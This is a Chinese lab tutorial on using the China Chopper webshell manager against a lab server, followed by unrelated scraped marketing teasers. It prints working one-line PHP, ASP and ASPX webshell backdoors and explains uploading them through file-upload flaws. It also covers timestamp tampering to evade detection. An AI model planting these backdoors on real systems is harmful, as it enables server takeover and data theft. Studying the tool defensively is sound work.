实验环境
操作机:Windows XP
目标地址:172.16.12.2
实验目的
认识中国菜刀工具
熟练使用中国菜刀工具进行网站文件管理
数据库管理
使用虚拟终端等操作
实验内容
中国菜刀的历史
中国菜刀是一款c/s型的webshell管理工具,它不像传统的asp恶意脚本或php恶意脚本上传到网站上可以直接打开,它有自己的服务端程序,但是这个服务端程序却极小,只有一句代码,因此保证了webshell的隐蔽性,并且这段代码所能实现的功能是非常强大的。
作者老兵,一个朴实,低调的技术牛人,当初在台湾闹独立的时候,他在国民党和民进党的网站上留下了“只有一个中国”的黑页,一举成名。
小i提示
在本次实验中,请注意实验工具、实验文件存放路径,不同的文件路径可能会出现不一样的实验结果.
在实验环境中无法连接互联网,请使用您本地的网络环境。
实验工具
中国菜刀:
这里的中国菜刀不是指切菜做饭的工具,而是中国安全圈内使用非常广泛的一款Webshell管理工具,想买菜刀请出门左拐东门菜市场王铁匠处。
中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用,据说是一位中国军人退伍之后的作品。只要支持动态脚本的网站,都可以用中国菜刀来进行管理!
在非简体中文环境下使用,自动切换到英文界面。UINCODE方式编译,支持多国语言输入显示。只要支持动态脚本的网站,都可以用中国菜刀来进行管理!主要功能有:文件管理,虚拟终端,数据库管理。
实验步骤
步骤一:安装中国菜刀
中国菜刀只能运行于windows系统下,其安装过程非常简单。
1.解压缩压缩包
2.进入解压后的文件夹中,运行caidao.exe 即可。
3.如果成功弹出工具的界面,则代表环境正常。
(备注:由于菜刀的名气太大,导致很多常见的杀软会报告为病毒.)
步骤2:认识菜刀目录文件
介绍菜刀目录下的几个主要文件及作用
caidao.exe
此为中国菜刀主程序。主程序经常被黑客修改植入后门并传播。
最近几个历史版本中无后门的菜刀 hash 如下:
文件: caidao-20100928.exe
大小: 200192 字节
MD5: C05D44DBE353525F492208D891B53875文件: caidao-20111116.exe
大小: 220672 字节
MD5: 5001EF50C7E869253A7C152A638EAB8A文件: caidao-20141213.exe
大小: 220160 字节MD5: 4B4A956B9C7DC734F339FA05E4C2A990
db.mdb
此为菜刀工具的数据库文件,存放了我们添加的shell等信息。菜刀支持从菜刀数据库导入shell。
catch.tmp
此文件为菜刀的缓存数据库(可删除),可对目标的目录文件等信息进行缓存,可使我们在没网的情况下也能查看目标信息。
步骤3:认识菜刀服务端payload
简单介绍asp、php、aspx、jsp的一句话恶意脚本
PHP:
?php @eval($_POST[pass]);?
ASP:
%eval request("pass")%
NET:
%@PageLanguage="Jscript"% %eval(Request.Item["pass"],"unsafe");%
JSP:
文件较大,在菜刀目录下customizecustomize.jsp
几个脚本中的pass皆为一句话脚本的密码,实际测试可以替换掉
一句话恶意脚本的使用:
以PHP脚本为例,将上述的PHP类型一句话恶意脚本保存为php文件,放在支持PHP脚本的web环境中(实战中通常是利用上传漏洞上传到服务器)
获得该文件的web端地址即可在中国菜刀中使用。(下面有详细介绍)
步骤4:配置菜刀
配置相关参数连接服务端
首先我们需要通过某种方式在目标站上传一个一句话恶意文件。
一般情况下我们是通过以下方法把一句话文件上传(或导出)到web服务器:
文件上传漏洞
后台数据库备份
sql语句导出
我们准备了一个一句话恶意脚本文件hack.php:
?php @eval($_POST[pass]);?
假设我们通过文件上传漏洞把一句话恶意脚本传到了web服务器http://172.16.12.2的web根目录,于是一句话恶意文件(webshell)地址为
http://172.16.12.2/hack.php
一句话文件的密码为pass。
然后我们在中国菜刀中选择添加该shell:
有几个相关参数需要填入:
webshel地址 webshell密码
分类目录(可选)
脚本类型 编码方式
配置图解如下图:
步骤5:文件管理操作
这些操作比较简单,我直接做操作演示
文件夹查看
实战测试中我们通过文件查看来获得目标机文件目录信息,来了解目标机大致的文件目录结构。
双击我们添加的shell,进入查看目录及文件:
文件上传
实战测试中有可能需要利用文件上传功能上传一些我们后期要用到的提权exp等。
直接拖放文件到对应目录即可
文件下载
实战测试中有可能需要利用文件下载功能下载服务器的数据库信息和源码来进一步分析目标。
右击需要下载的文件,选择下载文件。
菜刀在下载文件完毕后默认打开该文件。
这里要与下面的wget下载文件区分。这里的下载是下载目标机文件到我们本地,而wget则是下载web文件到目标机上。
wget下载文件
这是个小技巧,有时候服务端限制了文件上传,我们就可以通过这个方法来下载文件到服务器。需要注意到的是所下载的文件应该是不被浏览器解析的,如php,txt等。
在想上传的目录右击,选择下载文件到服务器,再填入文件的http地址和保存的绝对位置,然后点击wget即可:
修改文件或文件夹时间
黑客修改文件时间一般是为了规避一些安全软件或管理员通过查看文件创建和修改时间来排除恶意脚本。
右击需要修改时间的文件,选择修改文件(夹)时间,输入对应的时间格式即可:
戳阅读原文,参与实验吧~
受苹果公司新规定影响,微信 iOS 版的赞赏功能被关闭,可通过二维码转账支持公众号。
郑重声明: 本站所有内容均由互联网收集整理、网友上传,并且以计算机技术研究交流为目的, 仅供大家参考、学习,不存在任何商业目的与商业用途。 若您需要商业运营或用于其他商业活动,请您购买正版授权并合法使用。 我们不承担任何技术及版权问题,且不对任何资源负法律责任。 如无法链接失效或侵犯版权,请给我们来信:1849626408@qq.com
为什么做微商不成功?相信不少人做不好陌生人市场其可能主要有三个主要因素导致:不会主动、功利心太重、执行力差。下面我们就来为什么做微商不成功?可能原因在以下3点: 第一个因素:不会主动 经常看到有人在群里发信息:“每天坚持冒个泡,怕你们
之前,听很多人说利用百度系列来吸粉,的确百度是一个国内很好的搜索平台,光百度系列就有很多的推广方式都可以做展现,假如你是一个人的话,我想估计你玩转不过来,在我看来只要利用这一招方法做好即可——利用百度贴吧在吸粉。 百度贴吧目前是最大的
其实对于大多数营销的人来说,很多人在销售的过程当中,特别是一些没有经验或者很多失败的创业经验的人来说,都有非常多的一些痛点的存在。那做微商怎么引流找客源?找客源引流都有哪些窍门呢? 想让自己的销售变得更加的强大,想让自己的业绩变得更加的好
近几年,随着移动互联网行业的发展,传统的销售方式已经发生改变,越来越多的人开始做微商,微商的数量越来越多,同行之间的竞争也异常的激烈。在朋友圈里面,到处都是微商在宣传推广自身产品,而想要进一步地做大发展,就要去做微商代理了。 现在微商代
关于微商货源,可能对做微商的同学来说,是一个核心的问题,既然是核心问题,自然就会有各种各样疑问出现了,这里先给大家解答一下一手货源是什么意思,另外也会给大家普及一下一件代发是什么意思,跟着小编一起看看吧! 什么叫货源 从货源二字上我们
看过很多所谓朋友圈大师写的干货文章,要么偏重理论,要么只说操作细节,无法简单明了的把微商这件事说清楚,更有甚者根本没有从事过微商,人云亦云的误导读者。读这些文章的后遗症就是越看越不懂,完全找不到如何入手,更别说做好微商了。 本篇文章力求
微商新手如何与陌生客户聊天沟通?有不少的微商朋友好不容易引来了粉丝,却因为不会和陌生客户聊天,而白白流失了不少精准客户。 其实微商新手与陌生人客户聊天并没有想象中那么艰难,这也是有套路的。 主动介绍自己 首先你得做一个自我介绍,要注意
很多做微商的人会说加人好难啊,自己的微信好友都没300人。其实微信精准加粉是有一定方法的,下面为大家分享一些常见的做微商代理是如何精准加粉的 ,看看以下技巧你知道多少! 1、添加附近的人 附近的人分为两种,一个是现实当中附近的人,一个
外行人看的是热闹,内行人看的是门道,微商到底有什么前景,能否日进斗金,这个要具体问题具体分析。微商商业趋势势不可挡,今天我们就不去 一一展开,而我们的问题至关重要,也是决定能否让你实现创业成功赚到钱的关键。微商新手该如何选择最合适自己的产